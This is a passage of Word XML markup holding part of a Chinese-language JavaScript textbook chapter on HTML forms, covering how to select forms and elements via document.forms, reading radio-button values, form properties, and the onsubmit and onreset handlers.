      </w:r>
      <w:r>
        <w:t>15.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>节所描述的，有</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性的＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素能够通过很多方法来选取。</w:t>
      </w:r>
      <w:r>
        <w:t>name="address"</w:t>
      </w:r>
      <w:r>
        <w:t>属性的＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞可以用以下任何方法来选取：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.address//</w:t>
      </w:r>
      <w:r>
        <w:t>不可靠：不要使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.address//</w:t>
      </w:r>
      <w:r>
        <w:t>仅当表单有</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性时可用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.forms.address//</w:t>
      </w:r>
      <w:r>
        <w:t>显式访问有</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>的表单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.forms[n]//</w:t>
      </w:r>
      <w:r>
        <w:t>不可靠：</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>是表单的序号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>15.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节阐述了</w:t>
      </w:r>
      <w:r>
        <w:t>document.forms</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>对象，可以通过数字序号或</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>来选取表单元素。</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象本身的行为类似于多个表单元素组成的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>集合，也可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>或数字序号来索引</w:t>
      </w:r>
      <w:r>
        <w:t>。如果名为</w:t>
      </w:r>
      <w:r>
        <w:t>"address"</w:t>
      </w:r>
      <w:r>
        <w:t>的表单的第一个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"street"</w:t>
      </w:r>
      <w:r>
        <w:t>，可以使用以下任何一种表达式来引用该元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.forms.address[0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.forms.address.street</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.address.street//</w:t>
      </w:r>
      <w:r>
        <w:t>当有</w:t>
      </w:r>
      <w:r>
        <w:t>name="address"</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是只有</w:t>
      </w:r>
      <w:r>
        <w:t>id="address"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果要明确地选取一个表单元素，可以索引表单对象的</w:t>
      </w:r>
      <w:r>
        <w:t>elements</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.forms.address.elements[0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>documen</w:t>
      </w:r>
      <w:r>
        <w:t>t.forms.address.elements.street</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一般来说指定文档元素的方法用</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性要比</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性更佳。但是，</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单提交中有特殊的目的，它在表单中较为常用，在其他元素较少使用。它应用于相关的复选按钮组和强制共享</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性值的、互斥的单选按钮组。请记住，当用</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>来索引一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>对象并且它包含多个元素来共享</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>时，返回值是一个类数组对象，它包含所有匹配的元素。考虑以下表单，它包含多个单选按钮来选择运输方式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>form name="shi</w:t>
      </w:r>
      <w:r>
        <w:t>pping"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>fieldset</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>legend</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Shipping Method</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/legend</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="radio"name="method"value="1st"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>First-class</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/label</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="radio"name="method"value="2day"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2-day Air</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/label</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">input </w:t>
      </w:r>
      <w:r>
        <w:t>type="radio"name="method"value="overnite"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Overnight</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/label</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/fieldset</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/form</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对于该表单，用如下代码来引用单选按钮元素数组：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var methods=document.forms.shipping.elements.method;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素本身有一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性和对应的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性叫</w:t>
      </w:r>
      <w:r>
        <w:t>"method"</w:t>
      </w:r>
      <w:r>
        <w:t>，所以在此案例中，必须要用该表单的</w:t>
      </w:r>
      <w:r>
        <w:t>elements</w:t>
      </w:r>
      <w:r>
        <w:t>属性而非直接访问</w:t>
      </w:r>
      <w:r>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:t>属性。为了判定用户选取哪种运输方式，需要遍历数组中的表单元素并检测它们的</w:t>
      </w:r>
      <w:r>
        <w:t>checked</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var shipping_method;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>methods.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(methods[i].checked)shipping_method=methods[i].value;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在下一节中可以看到更</w:t>
      </w:r>
      <w:r>
        <w:t>多表单元素的属性，如</w:t>
      </w:r>
      <w:r>
        <w:t>checked</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="387" w:name="15_9_2_Biao_Dan_He_Yuan_Su_De_Shu_Xing_"/>
      <w:r>
        <w:t>15.9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　表单和元素的属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="387"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面描述的</w:t>
      </w:r>
      <w:r>
        <w:t>elements[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组是</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象中最有趣的属性。</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的其他属性相对没有如此重要。</w:t>
      </w:r>
      <w:r>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性（</w:t>
      </w:r>
      <w:r>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:t>）直接对应于＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性（</w:t>
      </w:r>
      <w:r>
        <w:t>attribute</w:t>
      </w:r>
      <w:r>
        <w:t>）。这些属性都控制了表单是如何来提交数据到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器并如何显示的。客户端</w:t>
      </w:r>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>avaScript</w:t>
      </w:r>
      <w:r>
        <w:t>能够设置这些属性值，不过仅当</w:t>
      </w:r>
      <w:r>
        <w:t>表单真的会将数据提交到一个服务端程序时它们才有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>产生之前，要用一个专用的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>提交</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮来提交表单，用一个专用的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>重置</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮来重置各表单元素的值。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象支持两个方法：</w:t>
      </w:r>
      <w:r>
        <w:t>submit()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reset()</w:t>
      </w:r>
      <w:r>
        <w:t>，它们完成同样的目的。调用</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>submit()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来提交表单，调用</w:t>
      </w:r>
      <w:r>
        <w:t>reset()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来重置表单元素的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有（或多数）表单元素通常都有以下属性。如果一些元素有其他专用的属性，会在后面单独考虑各种类型的表单元素时描述它们：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>标识表单元素类型的只</w:t>
      </w:r>
      <w:r>
        <w:t>读的字符串。针对用＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签定义的表单元素而言，就是其</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。其他表单元素（如＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>＞）定义</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性是为了轻松地标识它们，与＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素在类型检测时互相区别。表</w:t>
      </w:r>
      <w:r>
        <w:t>15-1</w:t>
      </w:r>
      <w:r>
        <w:t>的第二列给出了各个表单元素此属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对包含元素的</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象的只读引用，或者如果元素没有包含在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中则其值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>只读的字符串，由</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>指定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的字符串，指定了表单元素包含或代表的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。它就是当提交表单时</w:t>
      </w:r>
      <w:r>
        <w:t>发送到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的字符串，也是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序有时候会感兴趣的内容。针对</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Textarea</w:t>
      </w:r>
      <w:r>
        <w:t>元素，该属性值包含了用户输入的文本。针对用＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签创建的按钮元素（除了用＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签创建的按钮），该属性值指定了按钮显示的文本。但是，针对单选和复选按钮元素，该属性用户不可见也不能编辑。它仅是用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性来设置的一个字符串。它在表单提交时使用，但在关联表单元素的额外数据时也很有用。在本章后面关于不同类目的表单元素小节中将深入讨论</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="388" w:name="15_9_3_Biao_Dan_He_Yuan_Su_De_Shi_Jian_C"/>
      <w:r>
        <w:t>15.9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　表单和元素</w:t>
      </w:r>
      <w:r>
        <w:t>的事件处理程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="388"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>元素都有一个</w:t>
      </w:r>
      <w:r>
        <w:t>onsubmit</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序来侦测表单提交，还有一个</w:t>
      </w:r>
      <w:r>
        <w:t>onreset</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序来侦测表单重置。表单提交前调用</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>nsubmit</w:t>
      </w:r>
      <w:r>
        <w:t>程序；它通过返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>能够取消提交动作。这给</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序一个机会来检查用户的输入错误，目的是为了避免不完整或无效的数据通过网络提交到服务端程序。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>onsubmit</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序只能通过单击</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>提交</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
